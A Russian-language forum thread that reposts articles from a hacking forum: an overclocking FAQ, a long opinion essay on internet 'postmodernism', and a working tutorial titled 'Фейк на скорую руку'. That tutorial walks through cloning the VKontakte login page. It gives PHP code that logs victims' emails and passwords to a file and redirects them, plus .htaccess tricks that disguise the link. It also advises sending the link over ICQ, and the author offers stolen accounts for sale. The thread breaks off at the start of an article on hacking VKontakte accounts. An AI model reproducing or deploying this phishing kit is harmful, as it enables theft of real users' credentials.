Введение в Интернет и безопасность в нем

Расширенная информация об игровой Вселенной.
Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 29 апр 2009, 14:27

<span style="font-size: 18px"><span style="display: block; text-align: center"><!--coloro: red-->[color= red]<!--/coloro-->Faq начинающим оверклокерам.<!--colorc-->[/color]<!--/colorc--></span></span>
<span style="font-style: italic">Автор статьи - Folc с forum.antichat.ru</span>
<!--coloro: aqua-->[color= aqua]<!--/coloro-->
В: Что такое разгон (видеокарты, процессора), и для чего он нужен?<!--colorc-->[/color]<!--/colorc-->
О: Разгон видеокарты, процессора, оперативной памяти производится с целью повышения производительности данных компонентов компьютера. Осуществляется путём повышения частот, увеличением вольтажа, понижением таймингов, увеличением множителей.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->В: Какое железо лучше гонится?<!--colorc-->[/color]<!--/colorc-->
О: Все зависит от конфигурации и производителя ваших комплектующих. Есть комплектующие, которые производятся специально для разгона (в основном мат. платы), есть рядовое железо, но его потенциал ещё не раскрыт. Мой первый компьютер процессор, которого я смог разогнать был Pentium 200 MMX (до 233), так что дата производства железа ни как не влияет на наши задачи.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->
В: Какое железо лучше не гнать?
<!--colorc-->[/color]<!--/colorc-->
О: Чаще относится в видеокартам: Внимание! Если ваша видеокарта относится к категории NoName (т.е. производитель не известен), или на ней стоит пассивное охлаждение (т.е. стоит радиатор без вентилятора), то лучше с разгоном не замарачиваться. NoName быстро сгорают. Ну а пассивное охлаждение необходимо доработать (прикрутить вентилятор).
<!--coloro: aqua-->[color= aqua]<!--/coloro-->
В: Почему я должен разгонять? Почему инженеры не разогнали до меня?<!--colorc-->[/color]<!--/colorc-->
О: Уменьшение производительности влияет на прочность железа. Так же здесь маркетинговые причины, создание более быстрого железа, чем необходимо было.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->В: Я подумал, и решил разогнать компьютер. Что дальше?<!--colorc-->[/color]<!--/colorc-->
О: Первым делом нам нужно подготовится, а потом гнать. Прежде чем приступить к разгону зайдите на сайт производителя вашей видеокарты и материнской платы и проверьте наличие обновлений. Если такие присутствуют - внимательно ознакомьтесь с введёнными изменениями. Конечно, чаще, разработчики исправляют ошибки прошлых версий BIOS и добавляют новые опции. Но как оказывается на практике не всегда новый BIOS способствует хорошему разгону. В новой версии может быть заблокирована функция увеличения вольтажа (или разблокирована), может быть отключена функция изменения таймингов оперативной памяти, установлены какие либо тормоза и т.д. Руководство по обновлению ваших BIOS, будет лежать на сайте производителя ваших железок, поэтому мы не будем на этом задерживаться.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->В: Как правильно разогнать видеокарту?<!--colorc-->[/color]<!--/colorc-->
О: Постепенно повышайте частоту ядра с шагом в 10 МГц. После каждого повышения запускайте, какую нибуть игру, которая требует мощную видеокарту, и гоняйте её в течении 5 минут. Если за этот период компьютер не зависал, и не наблюдались артефакты (всякого рода мерцания, искажения картинки) можно ещё повышать частоты. Вместо игры советую лучше использовать современные программы для тестирования видеокарт (3DMark), которые по окончанию тестирования будут ещё нам показывать и прирост в производительности видеокарты. После того как компьютер зависнет, или появятся артефакты вернитесь на предыдущую частоту и протестируйте ещё раз. После разгона процессора переходите к разгону памяти. Аналогично повышайте частоты, и проводите тестирование как в случаи с процессором. По окончанию разгона проведите длительный тест в течении 30 мин.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->
В: Какими программами пользоваться?<!--colorc-->[/color]<!--/colorc-->
О: Рекомендую использовать программу RivaTuner. Она поддерживает как видеокарты NVIDIA, так и ATI.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->
В: Что ещё интересного?<!--colorc-->[/color]<!--/colorc-->
О: На видеокартах NVIDIA начиная с линейки FX есть разгон при помощи драйвера видеокарты. В драйверах позднее версии 95.XX эта функция удалена. Что радует: есть функция автоматического определения оптимальных частот.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->В: Почему у меня этой функции нет?<!--colorc-->[/color]<!--/colorc-->
О: Убедитесь, что у вас стоит драйвер, версия которого не выше 95.ХХ. Так же добавьте в реестр параметр CoolBits (DWORD), значение 2, путь HKLMSoftwareNVIDIA CorporationGlobalNVTweak
<!--coloro: aqua-->[color= aqua]<!--/coloro-->
В: Так с видеокартами чуть разобрались, а что на счёт процессора, как его разогнать?<!--colorc-->[/color]<!--/colorc-->
О: На примере AMD Sempron 2400+ (реальная 1666 МГц)
1. Идём в BIOS . Для этого во время загрузки компьютера нажимаем и удерживаем клавишу DELETE.
2. Заходим в Bios Features, ищем там CPU Clock со значением = 166, постепенно повышаем его с шагом равным 3-м. Реальная частота при этом каждый раз будет повышаться на 30МГц.
3. После жмём Save & Exit Setup.
4. Теперь на надо как можно больше нагрузить процессор для тестирования. Если появится нестабильность в работе, зависания - значить частоту необходимо вернуть на ступень ниже.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->
В: Чем я рискую?<!--colorc-->[/color]<!--/colorc-->
О : Риск один - спалить ядро. Но современное железо настолько защищено от перегрева, что этот риск сводится практически к нулю. Следите за температурой ядра, тогда у вас нет практически шансов его спалить, нормальной температурой для процессоров Sempron 2400 является температура равная 60 градусам. Для вашего процессора вы сможете найти информацию в поисковиках.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->
В: Как правильно организовать охлаждение?<!--colorc-->[/color]<!--/colorc-->
О: Как и тюнингованному мотору требуется новая тормозная система, так и разогнанному компьютеру требуется новое охлаждение. Пара новых куллеров установленных в системном блоке поможет вашей стандартной системе охлаждения справится с повышением температуры. Воздух в системном блоке циркулирует снизу вверх, учтите этот фактор при установке новых куллеров.

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 30 апр 2009, 13:48

<span style="font-size: 18px"><span style="display: block; text-align: center"><!--coloro: red-->[color= red]<!--/coloro-->Хакерский постмодернизм<!--colorc-->[/color]<!--/colorc--></span></span>
<span style="font-style: italic">Автор статьи - Cthulchu с forum.antichat.ru</span>
Неудержался. По моему, статья очень хорошая, стоит к тому, что бы ее прочли. Детям читать бесполезно (зная, что их тут как грязи).
И так, статья:
---
Итак вначале от себя-
попрошу сразу закрыть страничку с этой темой тех,
кто не читает до конца большие статьи, и
тех, кто дает коментарии типо кг/ам, ниасилил, афтар жжот,
и прочую мутотень.Ибо никто вас не заставляет читать её,
а читать не полностью просто не имеет смысла.
Кто-то прочитав статью скажет "Очень уныло" или "Что не не верится" и.т.д
У каждого сугобо личное мнение, и переубеждать вас никто не будет.
Но от себя могу сказать- "Почитай, хорошо написанно.Очень хорошо."
- А что, она работает? – Удивилась девочка, ощупывая гильотину.
- Работает всем на радость, вот только радость эта горькая, - сказал Эко.
Стивен Эриксон «Оттенки дьявольской скуки».


Тема у нас сегодня несколько необычная, что-то вроде «писатель и самоубийство» или «воровство как акт постпанковой диалектической культуры, нашедшей своё отражение в киберпанковой реальности современной России». Ну в общем хреновая у нас тема, да к тому же опасная как боевой топор викингов, которым решил побриться автор. Так и головы лишиться можно. Но не всё ж вам на форумах выклянчивать «спецов» ломануть почту любимой девушки (даю совет от себя: заломайте саму девушку, ха-ха-ха), учиться писать троянов, а так же выискивать баги в популярных программах. Пора немного и мозгами пошевелить, чтобы понять, где вы, когда вы и зачем вы. Преисполненный глубокого снобизма, я смело, как Анна Каренина, прыгаю под локомотив вашего мышления: современный интернет продукт вторичной пользы, опасный и требующий немедленной реструктуризации, а лучше государственного контроля с узаконенной смертной казнью.
Что есть по сути интернет? В первом приближении – место, где располагается, зарождается, распространяется, воспринимается, осознаётся информация, которой так много, что обыватель не в состоянии её полностью осмыслить и приходит к ошибочному выводу: «Всё уже написано, сыграно, сделано и нам остаётся лишь перерабатывать информацию созданную либо предыдущими поколениями, либо гениями-одиночками». С одной стороны то понятно, что легче воспользоваться новой версией WWWHack или переписать уже созданного Трояна (ох, чувствую я, сейчас ко мне домой начнут названивать компетентные органы) или даже скачать заплатку, патч, обновление, не разбираясь самостоятельно в проблеме. Возьмём, к примеру статью, написать которую я планирую уже год. Называется она «Как написать статью». Цитата (в духе постмодернистского самоплагиата): «Вы придумали новую статью? Блестяще! Теперь наберите её в яндексе, скачайте с неприметного ресурса, перепишите с нуля и выдайте за свою. Потому что всё, что вы придумали, за редчайшим исключением (которое следует расценивать как золото, найденное в канализации – не могу не плюнуть в лицо сетевым эстетам и скажу, что у меня таких статей аж на 10 % от всех работ наберётся), давно написано, разобрано по полочкам, украдено и ещё раз переписано. Остаётся только добавить свою лепту в тепловое нагревание вселенной и информационный хаос. Впрочем, может и у вас появится последователь, который совместит вашу статью с диссертацией по молекулярным фракталам и родит хоть что-то относительно новое под этой безумной луной».
Интернетовский плагиат – это ещё бог с ним, пусть замшелые профессионалы с ним борются: «Я, мля, эстет! Какого чёрта вы опубликовали мою статью о новой версии антивируса К у себя на портале! Вы позора не вынесите, если ссылку на мою домашнюю страничку «Я и моя странная кошка» не сделаете. Горите в аду!» Гораздо страшнее, когда эта зараза проникает в мозг и порождает самоплагиат. (Тут автор ушёл в подпространственные рассуждения о литературе вообще и месте современного человека в иерархии космологических сил в частности, но мощное телепатическое вмешательство редакции повернуло его на правильный путь.)
<…>Возьмём таких писателей как Лукьяненко, Донцова, Пелевин. Не во всех романах (Иисус из Назарета упаси меня такое сказать), но во многих из декораций только имена героев поменялись. Словно под копирку писали. Не говоря уже о том, что большинство героев большинства произведений мыслят одинаково и точно так же как и автор. Оставим литературу, я, мля, не эстет и не критик. Посмотрим на софт. Вы видели Office 12? Я видел. Аккуратно поменяли дизайн и оставили все те же функции. Впрочем, чего ещё нового там придумать и я не знаю. Но возьмите Windows Vista! Так грамотно своровать идеи у Linux и Mac OS мог только Гейтс! Там же практического ничего нового нет, всё, до последней строчки кода, либо существует в других системах, либо давно выпущено сторонними разработчиками. И при этом они уже пять лет делают эту систему, выкинув действительно свой проект Windows Blackcomb-Vienna за орбиту 2010 года. Или вот с пеной у рта ожидаемая PS3 (каюсь, даже я коплю на неё денежки, прельстившись блю-рей приводом). Не помню сколько там у неё терафлопс производительности, этакий маленький суперкомпьютер. Ну реализовали они там технологию 1999 года, запихав восемь ядер. Но это устаревшая технология! Она даёт чисто физический прирост производительности, обеспечивая грамотную прорисовку и фантастическую графику. И всё. На AI в новых играх не надейтесь. Да хоть тысячу процессоров они туда поставят и сделают виртуальную реальность – противник всё равно не додумается сменить оружие, обойти вас сзади и подстроить хитроумную ловушку. Зато игроделы будут развивать он-лайн гейминг. Ну да, чего тратиться, когда можно человека поставить против человека и сэкономить пару миллиардов на разработку удовлетворительного геймплея.
Я не знаю, что это, жадность или лень. Всё ж проще двигать давно апробированные старые технологии, чем развивать новые. Примеров можно привести огромное количество, но по большому ИМХО не малую роль в отупении сознания сыграл интернет. Чёрт, столько информации! И всё бесплатно. Зачем нам выискивать какие-то проги, читать какие-то обзоры, когда можно скачать из P2P вторую бету Висты и наслаждаться вместе с тысячами других дурачков.
И всё это – постмодернизм.
Я не роняю крокодильи слёзы по поводу нарушения авторских прав или из-за прочей фигни. Просто мне кажется, что наша жизнь могла бы быть чуточку лучше. Хотя бы не столь походить на киберпанк, как это происходит сейчас. Знаете, если вы хотите писать компьютерные статьи (И если вы не из племени полубогов профессионалов, которые с маниакальным упорством описывают выход «новых» материнских плат и версий программ), то вам следует отказаться от интернета. Изучить какую-либо систему можно, лишь оказавшись вне её пределов, и именно так была рождена концепция Web 2.0.
Впрочем, это всё частности, на практике пользователи имеют дела с другими последствиями интернетовского постмодернизма. Поясню цитатой (автор смеётся и делает ещё одну затяжку): «Реклама и спонсорство всегда были замешены на использовании образного ряда для создания ассоциативной связи товаров с позитивными культурными или социальными событиями. Брэндинг же образца 90-х годов замечателен тем, что все более стремится вывести эти ассоциации из разряда предметно-изобразительных средств и сделать их переживаемой, проживаемой реальностью. Иными словами, когда кроссовки ассоциируются со свободой, уверенность в своих силах - с дезодорантом, а хороший вкус - с сотовым телефоном, это только цветочки. Заветная ягодка брэндинга - добиться того, чтобы свобода ассоциировалась с кроссовками; в идеале - до такой степени, чтобы в учебниках истории вместо национально-освободительной обозначилась национально-кроссовочная борьба».
Улавливаете, к чему я клоню? Мода постмодернизма – это iPod, который давно уже перестал быть плеером и перехватил инициативу у сотовых телефонов. Давайте не будем делать хороший плеер (вспомнил, что только что писал про ай-под, заглянул в одну из статей – вы её увидите чуть позже – и увидел, что да, так и есть, я сознался в покупке 20 Gb iPoda. «Деймос©, ну ты и мудак!» - подумал я... поскольку настоящей хороший плеер iRiver – уже об этом упоминал на страницах Х и получал кучу гневных откликов, мол, фигня это, но своего мнения не изменил, так что выбирайте сами, - а Яблочники не более чем раскрученный бренд в красивой упаковке. И опять таки нам легче принять то, что мы уже и так знали. Повторяйте за мной как зомби: «Фирма Apple позволяет нам думать иначе, фирма Apple – лучшая фирма, а её продукция это то – для чего мы созданы».
Творческий поиск сменился на творческую же модернизацию. Вы думаете, почему у Microsoft менеджеров больше чем программистов – они это уловили одними из первых. Не важно содержание, важен внешний лоск. Постмодернизм здесь такой необъятный, что накрывает даже наших любимых подонков. Правильно, смысл то тот же – употребление наркотиков, сексуальные взаимоотношения, общение с друзьями и алкоголем и т. д. – но поданный в необычной обёртке: ф фас йа фтыкал, та многа букаф, асилить креатифф не в силах. Так что радуйтесь, написав «аффтор жжот» вы автоматически встали с мировыми брендами в один ряд и примкнули к многочисленным постмодернистам нашей эпохи.
А что в итоге? – спросит терпеливый читатель и получит ногой по почкам за ПМ вопрос. Нет никакого «итога», есть процесс, движение PN-порядка, который несёт в себе интеллектуальная смерть, большие затраты, компьютерный багги и прочие ужасы глобальной жизни. Да если бы не этот постмодернизм, хакеры давно бы научились шевелить собственными мозгами и правили бы миром (это я примазываюсь на всякий случай – вдруг и правду интернет захватят, так я покажу им статью и выделю себе в личное княжество какой-нибудь пиндосстан).
Претендуя на полную объективность, я, скрипя сердцем и зубами, поведаю положительную сторону постмодернизма. Безвкусный и нарочитый стёб, засилье брендов и моды, стереотипность мышления, плагиат и сознательное издевательство над необъятным космосом – это очень удобно. Дальше пойдут цитаты, уж простите, но более ёмко и лаконично я сказать и мог бы, но мне лень! (Автор хохочет, затем лезет под стол и ищет потерявшуюся плюшку.) Так вот, на поверку жизнь в постмодерне оказывается банальной пубертатной сублимацией. Поясню, в чем дело. «В определенном возрасте дети испытывают непреодолимое желание выделиться из общей массы любыми правдами и неправдами. Так называемый синдром «Доживем до понедельника» — когда «все вы толстокожие дураки», «меня, тонкого, не понимаете» и «тьфу на вас». Теперь поясню цитату, а так же расскажу, в чём она не права: стремление выделиться может проявляться в нестандартном поведение, отсюда и ноги растут у «подонков», выбор художественного языка которых целиком определяется принципом постмодернистского эпатажа. Лечение: кризисы переходного возраста проходят в основном у всех, и даже Удав сейчас приторговывает в открытом на его же сайте магазине. Моду надо эксплуатировать! Эксплуатировать согласно обратному «эффекту большинства», когда люди, чувствуя душевную опустошённость, стремятся стать «такими как все», ощутить себя частью единого могучего организма. То есть «аффтор», который к своим статьям получал комментарии «кг/ам», с гораздой больше вероятностью купит майку с надписью «Generation НАХ..» чем его более успешные коллеги. Неудачники ищут чем заполнить душевную пустоту.
Под ваши одобрительные вопли сделаю ещё одну цитату, на этот раз маргинального Даниила Шеповалова: «Меня читают одни неудачники». Именно эта фраза натолкнула меня на мысль, что постмодернизм завязан на самом себе: создаётся вторичный продукт, который пытается заполнить душевную пустоту потребителя, однако пустота эта может заполниться только собственными мысли, коих не наблюдается по причине присутствия мыслей чужих. А спрос рождает предложение! Очень удобно разграничить «удачливых» и «неудачливых»: писатель (пусть даже воинствующий графоман), программист, бизнесмен – успешен сам по себе, вне зависимости от качества продукта. А вот конечный потребителей становится в нашей системе в позу «зю», широко раздвигает ягодицы, и, ну, не важно. Вот Билл Гейтс – это успех. А системный администратор – лох последний, поскольку всё, что он производит, ограничивается головной болью у начальства и подчинённых.
Конечно, я описал гротескную больную систему, которая, тем не менее, живо соответствует нашему обществу, построенному на использовании «неудачников», потребляющих полнофункциональное дерьмо. Кстати, по поводу упомянутого графоманства. Я порылся в сети, посидел в библиотеке и собранные материалы применил к себе и всей IT-индустрии, выискивая следы этой опасной болезни. И с удивлением обнаружил, что в 90 % случаев я – больной графоман с манией величая, плохим слогом, отвратительным вкусом, дешёвым самомнением, нулевой профессиональностью и полной творческой бездарностью. Я не эстет, мля! От самоубийства карандашом прямо там, в библиотеке меня удержали оставшиеся 10 % процентов, в коих и жила настоящая сила. Ну то есть, если отбросить весь плагиат, раздутые водой статьи (гонорары у сетевых писателей маленькие – кстати, да! – а лень великая и большая и голодом её не победить), бессмысленные описания всем известных вещей и концептуальную лживую ересь (ну почти не употребляю я наркотики и не хочу, чтобы человечество вымерло – с кем же тогда трахаться), останется то, ради чего вы тратите своё время. Информация, которая позволяет людям мыслить.
И эта информация говорит, что в 90 % существующей в интернете информации не нуждаются 90 % пользователей. В интернете почти невозможно изобрести что-то новое плюс вы будете обречены на цитирование даже в «новом». Цитата (сатанинский хохот): «Эту галиматью заклеймил вождь пролетариата В. И. Ленин, отметив неуемное стремление каждой амебы оставить хоть какой-то след в жизни». А в IT так и вовсе страшно становится: все дружны как никогда. Если пишет иксбит про хороший антивирус, то секьюритилаб о нём пишет и Алекс Экслер и мальчик Вова под псевдонимом КулХакер. А то что «хороший» жрёт 90 % системных ресурсов и кричит как недорезанная свинья, да и вирусы не все ловит – это как-то побоку. Причём о западных антивирях мы тактично умолчим. Почему в сети одна единственная мысль становится одинаковой для всех? В лучшем случае появляется ровно 50 % антиподов. И никогда мы не ищем третью сторону, никогда не высказываем, что лучше, а в большинстве случаев и не формулируем такую мысль. Что лучше: яндекс или рамблер – гугл! Какая система хуже: линукс или виндоус – обе! Пользователь интернета максимум на что способен: выбрать из двух зол меньшее, но всем знакомое.
И тут я, почтенно поправив очки, должен важно заявить: читайте только хакер и мы покажем вам не два зла, но одно добро. К чёрту! Да не фига вы не знаете про GoogleOS, Bitdefender, Graphical Password, закупкам на eBay и Amazon, открытие правильного порно-портала и дзен-буддизме компьютерных технологий. Вы уже просто не замечаете той жизни, в которой живёте. Легко обвинять авторов, программистов, хакеров в том, что «их мышление им удобно», «они плохие, потому что плохие» и «давайте их всех казним, они нам надоели», но не в большей ли степени это соответствует вам? Не надо искать виноватых в том, что компьютеры стоят дорого, вирусы – гады, а писателям нечего писать. Вы сами своей пустотой и своим мышлением создали наш весёлый постмодернизм. Вот и живите со своими бесконечными необъятными компьютерными проблемами, которые никто не спешит решать. Гейтсу плевать. Хакерам тоже. Они не враги вашему мышлению, но и не друзья, скорее, иное измерение, до которого вам не допрыгнуть. Всё же эта статья написана именно для вас, пользователей бескрайнего рунета. Потому что кто-то должен покончить с этим мрачным киберпанком «лучших» и «худших»: страна у нас пока одна и интернет тоже, и я точно такой же пользователей продукцией, как и вы и уж тем более не всезнающий бог. И мне очень хочется узнать, чем же меня кормят.
Деймос Стренталл
---
я ее прочел и скопировал отседова:
(с) __tp://soc-engineer.ru/showthread.php?p=818#post818

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 01 май 2009, 06:33

<span style="font-size: 18px"><span style="display: block; text-align: center"><!--coloro: red-->[color= red]<!--/coloro-->Фейк на скорую руку<!--colorc-->[/color]<!--/colorc--></span>
</span>
<span style="font-style: italic">Автор статьи - nonamez с forum.antichat.ru</span>
<span style="display: block; text-align: center"><!--coloro: aqua-->[color= aqua]<!--/coloro-->[iNtrO]<!--colorc-->[/color]<!--/colorc--></span>
Делать было нечаго,дело было вечером....Собственно на первую мою статью (первую на античате), потянул меня тот факт, что в разделе купи/продай/обменя/кинь по крупному есть тема, в которой один хеккер продовал фейки аж по 10 вмз, да и часто просят создать тот или иной фейк...
Я же расскажу одной статьей как можно забацать универсальный фейк почти подо все, что угондо! Покажу на примере фейка вконтакте.
<span style="display: block; text-align: center"><!--coloro: aqua-->[color= aqua]<!--/coloro-->[SeaRchINg]<!--colorc-->[/color]<!--/colorc--></span>
И так, 1 что нам нужно, так это выбрать жертворесурс и собрать всю нужную нам инфу,а нам нужна толька копия некоторых страниц.Идем на vkontakte.ru через Operu (!). Жмякаем кнопочку вход, попадаем на логин.пхп, ее и возьмем за индекс нашего фейка. Жмем в опере: Фаил-->Сохранить как-->В открывшимся диалоге под названием выбираем (по умолчанию там стоит Веб Архив....) "HTML Фаил с изображениями", и обезательно графу Имя Файла пишем<!--coloro: red-->[color= red]<!--/coloro--> index<!--colorc-->[/color]<!--/colorc-->(или login.htm- в зависимости от страницы)
<span style="display: block; text-align: center">Изображение</span>
Далее вводим туда нереальные данные и попадаем на страницу, на которой написано
<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>Такой почтовый адрес не зарегистрирован, либо пароль неверный.</pre></div></div></div>Сохраняем ее точно так же, только<!--coloro: red-->[color= red]<!--/coloro--> вместо index пишем bad.<!--colorc-->[/color]<!--/colorc-->
Далее вбиваем в Google.ru фразу Vkontakte.ru, жмем Дополнительные результаты с vkontakte.ru » и ищим что-то связанное с эрором контакта... На вторйо страницы я нашел VKontakte | Error (http://vkontakte.ru/blank.php?code=10)- запоминаем,нам понадобиться эта ссылка
Усе, все что нам надо для фейка от ресурса, у нас уже есть.
<span style="display: block; text-align: center"><!--coloro: aqua-->[color= aqua]<!--/coloro-->[CoDiNg]<!--colorc-->[/color]<!--/colorc--></span>
Такс, теперь иследуем форму логина. Открываем наш index.html и ищем форму входа.
<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 35em"><pre><form method="post" name="login" id="login" action="login.php"> <input type="hidden" name="success_url" id="success_url" value=""> <input type="hidden" name="fail_url" id="fail_url" value=""> <input type="hidden" name="try_to_login" id="try_to_login" value="1"> <table align="center" cellpadding=0 cellspacing=7 border=0 width="40%"> <tr> <td width="100px"> <span class="grey">Email:</span> </td> <td> <input class="inputText" type="text" name="email" value="" id="email" size="25" /> <td> </tr> <tr> <td> <span class="grey">Пароль:</span> </td> <td> <input class="inputText" type="password" name="pass" value="" id="pass" size="25" /> </td> </tr> <tr> <td>   </td> <td> <input style="margin-top:1px; vertical-align: middle;" type="checkbox" name="expire" id="expire" value="1" /><small>Чужой компьютер</small> </td> </tr> <tr> <td>   </td> <td></pre></div></div></div><em class="bbuline">Отсюда запоминаем 3 вещи:</em>
1)

<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre><form method="post" name="login" id="login" action="login.php"></pre></div></div></div>2)

<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre><input class="inputText" type="text" name="email" value="" id="email" size="25" /></pre></div></div></div>3)

<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre><input class="inputText" type="password" name="pass" value="" id="pass" size="25" /></pre></div></div></div>Именно в этих 3 вещах заключаеться первая часть уникальности, на любой социалке или эмайле или еще где либо, везде форма входа(поля), будут в таком види (ну только название полей будит отличаться),к примеру у однокласников это
<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre><input id="field_password" value="" style="width: 170px;" type="password" size="20" name="st.password"></pre></div></div></div>Тоесть просто отличаеться название полей, элементами дизайна-но функция у всех одна и таже.
Теперь мы создаем пхп файл, и называем его к примеру login.php,его содержимое:
<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 28.5em"><pre><?php/*##############by_NoNameZ############*/$f=fopen("log.txt","at"); flock($f,2); if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+.)+[0-9a-z]{2,4})$/i", $_POST['email'])&& !empty($_POST['password'])){fputs($f, $_POST['email'].";".$_POST['password']." n"); header("Location: http://");} else { header("Location: http://");}flock($f,3); fclose($f); ?></pre></div></div></div>Собственно смотрим на скрипт, пару строчег, но это вполне нормальный фейк,его функционал:
Сохранение передаваемых переменных,их проверка,редирект в зависимости от проверки.
И так, теперь возвращаемся к тем 3 строчкам:
1)

<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre><form method="post" name="login" id="login" action="login.php"></pre></div></div></div>тут у нас все в порядки,имя нашего скрипта совподает с именем ихнего, нобывает что и не совпадет, тогда заменяем его или же переиминовываем наш.
2)

<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre><input class="inputText" type="text" name="email" value="" id="email" size="25" /></pre></div></div></div><div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre><input class="inputText" type="password" name="pass" value="" id="pass" size="25" /></pre></div></div></div>Отсюда нам нужно name="email" и name="pass"
Вставляем их в наш скрипт в нужное место
<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 28.5em"><pre><?php/*##############by_NoNameZ############*/$f=fopen("log.txt","at"); flock($f,2); if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+.)+[0-9a-z]{2,4})$/i", $_POST['email'])&& !empty($_POST['pass'])){fputs($f, $_POST['email'].";".$_POST['pass']." n"); header("Location: http://");} else { header("Location: http://");}flock($f,3); fclose($f); ?></pre></div></div></div>Кто не заметил, это $_POST['email'] и $_POST['pass']
Далее смотрим скрип, тут стаит функция IF ELSE, и прегматч, тоесть если поле эмайл соотвествует эмайлу(ника@мыло.ру, а не как водят ывпмдвгк), и поле пароль не пустое, то выполняеться первый редирект, если же эмаил не соответствует или поле пасс пустое, то на второй редирект. Из этого следует,что если челл ввел мыло и что-то похожее на пасс, то кидаем его на страницу с эрором http://vkontakte.ru/blank.php?code=10, а если ввел херню (вот тут нам и понадобилась копия страницы bad.html?когда мы вводили неверные данные), то кидаем его обратно, тоесть вписываем bad.htm.
Выглядит это так:
<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 28.5em"><pre><?php/*##############by_NoNameZ############*/$f=fopen("log.txt","at"); flock($f,2); if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+.)+[0-9a-z]{2,4})$/i", $_POST['email'])&& !empty($_POST['pass'])){fputs($f, $_POST['email'].";".$_POST['pass']." n"); header("Location: [url=http://vkontakte.ru/blank.php?code=10"%3b%29;}]http://vkontakte.ru/blank.php?code=10");}[/url] else { header("Location: bad.htm");}flock($f,3); fclose($f); ?></pre></div></div></div>Сохраняем.Заливаем всю лабуду на сервер(login.php,index.htm+папка с файлами,bad.htm+папка с файлами),создаем файил log.txt(советую свое уникальное имя придумать. не забудьте в скрипте сменить),ставим на него chmod777.
3) небольшой апдейт...
Этот апдейт подойдет очень дл СИ,в корне на фтп создаем фаил .htaccess со следующим содержанием:

<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 9em"><pre>RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_URI} !index.htm RewriteRule (.*) index.htm? [QSA]</pre></div></div></div><!--coloro: red-->[color= red]<!--/coloro-->ВНИМАНИЕ!!!<!--colorc-->[/color]<!--/colorc-->
!index.htm-на этот фаил ссылаеться редирект, если же у вас фейк допустим login.html. то соответственно вам нужно переиминовать индекс в логин.
Такс, данный фаил нам дает ссылку более качественно газлива, а именно:
вашфейк.ру/любой текст, тобишь зная ссылку структуру согдаваемого фейка, к примеру контакта, мы можем сделать так:

<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>вашфейк.ру/photos.php?act=show&id=15884695_588954334&uid=359648756&self=6</pre></div></div></div>и впарить это по аське)))согласитесь. менее заметен теперь фейк))
Вот и все
<!--coloro: aqua-->[color= aqua]<!--/coloro--><span style="display: block; text-align: center">[THe eND]<!--colorc-->[/color]<!--/colorc--></span>
Собственно что уникального, а то что вы можете зайти на на одноклассников, так же сохранить страницу,вписать переменные,заменить урлы( вот сразу даю http://odnoklassniki.ru/dk?st.cmd=error) и все, обсолютно так же зайти на майил.ру, сохранить переменные и заменить и все))) Единственное, что вам может понадобиться-это креативность, добустим сохранять не главную страницу, а страницу входа.Вы так же можете сделать любой форум, если вы допустим хотите получить акк(отправляете в пм
<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre><a href="фейк">ссылка на тему</a></pre></div></div></div>, а в фейке указываете эту тему для редиректа.
Ну и в конце хочу добавить, если кто-то хочет купи акки социалок-стучити, цены актуальные)))

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 02 май 2009, 17:05

Эх, надо бы это в первый пост добавить =).
От себя скажу, что товарищ Алексей прав - вся информация в данной теме предназначена только в целях ознакомления и предотвращения возможностей хакерских атак на ваш компьютер/е-мэйл. Не пытайтесь применять полученные знания о взломе на практике! <del>Увижу - руки оторву!</del> Ребята, давайте жить дружно (с).

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 05 май 2009, 14:35

<span style="font-size: 18px"><!--coloro: red-->[color= red]<!--/coloro--><span style="display: block; text-align: center">Способы взлома аккаунтов vkontakte.ru<!--colorc-->[/color]<!--/colorc--></span></span>
<span style="font-style: italic">Автор статьи - ZiLiBoBa с forum.antichat.ru</span>
<span style="display: block; text-align: center"><!--coloro: aqua-->[color= aqua]<!--/coloro-->INTRO<!--colorc-->[/color]<!--/colorc--></span>
